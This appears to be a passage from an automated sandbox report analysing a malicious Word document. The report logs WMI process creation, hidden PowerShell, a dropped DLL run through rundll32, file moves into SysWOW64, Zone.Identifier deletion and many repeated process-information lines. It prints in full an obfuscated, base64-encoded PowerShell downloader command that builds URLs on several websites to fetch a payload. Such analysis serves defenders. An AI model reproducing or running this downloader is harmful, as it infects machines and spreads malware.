gAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
                      Suspicious powershell command line foundShow sources
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10008085 push ecx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004ADA push ecx; ret

                      Persistence and Installation Behavior:

                      barindex
                      Creates processes via WMIShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Cgjbbwbf\qqtudgd.hujJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Cgjbbwbf\qqtudgd.huj:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Nkqiqdbodnub\wtlcjwyiszo.kcs:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Zersybwlygjod\ujnaefcctevs.wag:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Gocmtvldv\plpbjoam.bfk:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Uyxqa\ucgv.gdq:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Nxixsue\ekwnwx.zgx:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Vgjjq\jcse.fro:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Kggdchrkalohz\pkgboheoanvf.hox:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Jhnbwsyvosmob\uzkhbqpbyyqm.xoq:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Ulduktzjxplnmpb\xnnmpmxkpltkbl.ghw:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Ohslgtw\xeprri.cyh:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Adumhgbkvoz\tdxrpdrtbm.quu:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Fnniqydokod\xeqkvdqlhe.bce:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Wpjypezem\yvgznbmd.qnx:Zone.Identifier read attributes | delete
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
